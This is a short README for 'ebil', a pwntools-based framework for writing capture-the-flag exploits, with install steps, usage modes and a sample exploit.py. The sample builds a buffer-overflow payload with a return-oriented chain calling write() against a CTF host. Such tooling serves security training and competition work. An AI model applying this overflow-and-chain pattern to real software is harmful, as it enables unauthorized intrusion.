ebil is an exploit code framework for CTFs, based on pwntools
Command line tools + python library
ebil new <process>
-> ./exploit.py
with process
will be generated
pip install ./py
usage:
./exploit.py # run locally
./exploit.py p # run locally (pause on breakpoints)
./exploit.py r # remote
exploit.py:
#!/usr/bin/env python
from ebil import *
exec ebil('./vuln', remote=('pwnable.example.com', 35555), args=['wei'], arch='x86_64')
if LOCAL: log.info('** LOCAL **')
payload = 'a'*140
dummy = 0xbeefbeefbeefbeef
payload += chain([
elf.symbols['write'], dummy, 1, 0x8049348, 4,
])
send(payload, 200)
print repr(r.recvrepeat())
r.wait_for_close()
git clone https://github.com/193s/ebil && cd ebil
install -v ebil /usr/local/bin
pip install ./py
Copyright (c) 2015 193s
Published under the GNU GPLv2, see ./LICENSE